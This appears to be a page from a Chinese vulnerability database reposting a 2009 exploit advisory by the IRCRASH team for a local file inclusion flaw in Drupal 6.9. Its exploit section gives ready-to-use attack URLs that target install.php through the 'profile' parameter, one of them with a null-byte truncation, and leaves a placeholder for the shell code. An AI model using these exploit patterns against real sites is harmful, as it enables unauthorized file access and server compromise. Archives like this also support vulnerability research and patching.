LFI in Drupal CMS

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052199 漏洞类型
发布时间 2009-02-11 更新时间 2009-02-11
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009020027
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
 Author : Rasool Nasr

-------------------------------------------

Discovered by : Rasool Nasr

-------------------------------------------

Exploited By : Rasool Nasr

-------------------------------------------

E-Mail : rasool.nasr_at_gmail.com

-------------------------------------------

WebSite : http://ircrash.com

-------------------------------------------

Our Team : ircrash

-------------------------------------------

IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr

-------------------------------------------

CMS: Drupal ( Version 6.9 )

Download CMS : http://ftp.drupal.org/files/projects/drupal-6.9.tar.gz

-------------------------------------------

LFI

Exploit :

http://[sitename]/drupal/install.php?profile=[shell code]


or


http://[sitename]/drupal/install.php?profile=[shell code]%00
-------------------------------------------